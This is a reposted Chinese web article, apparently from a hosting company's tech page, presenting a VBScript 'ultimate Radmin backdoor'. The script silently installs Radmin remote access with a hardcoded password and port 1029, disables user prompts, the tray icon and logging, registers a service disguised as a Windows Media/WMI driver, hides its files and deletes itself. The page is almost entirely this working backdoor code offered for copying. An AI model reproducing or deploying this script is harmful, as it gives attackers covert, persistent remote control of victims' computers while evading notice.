快速业务通道

Vbs脚本实现radmin终极后门代码_删除自身

作者 佚名 来源 ASP编程 浏览 发布时间 2013-07-09


复制代码 代码如下:

onerrorresumenext
constHKEY_LOCAL_MACHINE=&H80000002
strComputer="."
SetStdOut=WScript.StdOut
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&_
strComputer&"\root\default:StdRegProv")
strKeyPath="SYSTEM\RAdmin"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEM\RAdmin\v2.0"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEM\RAdmin\v2.0\Server"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEM\RAdmin\v2.0\Server\iplist"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
strKeyPath="SYSTEM\RAdmin\v2.0\Server\Parameters"
oReg.CreateKeyHKEY_LOCAL_MACHINE,strKeyPath
SetobjRegistry=GetObject("Winmgmts:root\default:StdRegProv")
strPath="SYSTEM\RAdmin\v2.0\Server\Parameters"
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary=Array(1,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary=Array(0,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
uBinary=Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119)//此为注册表导出十六进制转为十进制数据pass:241241241
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary)//Radmin密码
uBinary=Array(5,4,0,0)//端口:1029
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
uBinary=Array(10,0,0,0)
Return=objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&strComputer&"\root\default:StdRegProv")
strKeyPath="SYSTEM\RAdmin\v2.0\Server\Parameters"
strValueName="LogFilePath"
strValue="c:\logfile.txt"
setwshshell=createobject("wscript.shell")
a=wshshell.run("sc.execreateWinManageHelpbinpath=%systemroot%\system32\Exporer.exestart=auto",0)
oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
SetoReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\"&strComputer&"\root\default:StdRegProv")
strKeyPath="SYSTEM\ControlSet001\Services\WinManageHelp"
strValueName="Description"
strValue="WindowsMediaPlayerWindowsManagementInstrumentationPlayerDrivers."
oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName="DisplayName"
strValue="WindowsManagementInstrumentationPlayerDrivers"
oReg.SetStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName="ImagePath"
strValue="c:\windows\system32\Exporer.exe/service"
oReg.SetExpandedStringValueHKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
setwshshell=createobject("wscript.shell")
a=wshshell.run("netstartWinManageHelp",0)
b=wshshell.run("attrib+r+h+s%systemroot%\system32\exporer.exe",0)
c=wshshell.run("attrib+r+h+s%systemroot%\system32\AdmDll.dll",0)
d=wshshell.run("attrib+r+h+s%systemroot%\system32\raddrv.dll",0)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)//自删除

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号